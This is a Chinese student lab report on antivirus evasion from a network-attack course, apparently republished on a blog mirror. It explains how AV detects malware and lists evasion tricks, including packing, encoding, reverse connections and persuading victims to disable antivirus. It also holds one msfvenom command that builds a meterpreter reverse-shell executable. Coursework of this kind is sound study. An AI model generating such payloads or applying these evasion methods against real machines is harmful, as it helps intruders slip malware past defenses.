zoukankan      html  css  js  c++  java
  • 20145334赵文豪《网络对抗》——免杀原理与实践

    基础问题回答
    (1)杀软是如何检测出恶意代码的?

    基于特征码:通过特定数据来识别病毒,通常修改一处就可以免杀。特征码的查找方法:文件中的特征码被我们填入的数据(比如0)替换了,那杀毒软件就不会报警,以此确定特征码的位置。
    基于行为:典型的行为如连接恶意网站、开放端口、修改系统文件,典型的“外观”如文件本身签名、结构、厂商等信息等。

    (2)免杀是做什么?

    改变恶意程序的明显特征等信息已达到避免被杀毒软件查杀的技术

    (3)免杀的基本方法有哪些?
    技术分类
    改变特征码

    加壳:使用专业的加壳软件,掩盖特征码;

    使用encode等进行编码,进行异或、+1、-1等类似操作改变特征码;

    使用其他语言进行重写再编译,如veil-evasion。

    改变攻击行为

    反弹式连接能大大减少被阻止查杀的风险;

    在正常应用软件中插入恶意代码;

    将恶意代码加密,运行恶意代码后再解密进行恶意操作;

    非常规方法

    使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。

    使用社工类攻击,诱骗目标关闭AV软件。

    纯手工打造一个恶意软件

    实验步骤
    msfvenom直接生成meterpreter可执行文件

    1、首先使用命令

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机ip PORT=监听端口号 -f exe > 20145334.exe
    使用生成meterpreter可执行文件20145334.exe

    用后门程序做查杀实验


    再次做查杀实验

    使用该编码器即使编码次数再多也不会起到实质性效果啊,但是被查杀数还是减少了

    使用Veil-Evasion,Veil-Evasion生成可执行文件

    •在终端输入指令veil-evasion打开软件
    进入操作界面

    把生成的后门程序放在网站上查杀,结果如图所示

    C语言调用Shellcode

    在kali下进入MSF打开监听进程

    kali成功获取权限

  • 相关阅读:
    (转)解读Flash矩阵
    Size Classes with Xcode 6
    Android viewPage notifyDataSetChanged无刷新
    pgbouncer 源码编译安装
    在greenplum中创建master only 表
    创建函数查询greenplum使用到某个数据表的所有视图
    greenplum 视图权限
    创建视图查询所有segment 实例上的会话状态
    greenplumdb 元数据检查gpcheckcat 问题修复一例
    pg_dump 备份greenplum db 报错退出
  • 原文地址:https://www.cnblogs.com/bestizwh/p/6624447.html
Copyright © 2011-2022 走看看